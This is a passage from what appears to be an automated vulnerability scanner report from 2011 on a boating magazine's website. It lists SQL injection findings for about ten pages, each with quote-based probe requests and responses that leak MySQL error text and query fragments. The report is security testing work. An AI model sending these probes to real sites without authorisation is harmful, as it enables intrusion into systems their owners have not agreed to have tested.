Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.147. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/sea-savvy

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/sea-savvy?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/sea-savvy?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.148. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/tech-talk

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/tech-talk?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/tech-talk?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.149. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/used-boat-review

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/used-boat-review?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/used-boat-review?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.150. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/calendar

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /calendar?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /calendar?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.151. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/career-opportunities

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /career-opportunities?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /career-opportunities?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.152. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.153. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/bay-tripper

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/bay-tripper?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/bay-tripper?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.154. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/books

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/books?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

Request 2

GET /columns-blogs/books?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.155. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/new-england-fishing

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/new-england-fishing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/new-england-fishing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.156. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/under-way

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/under-way?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
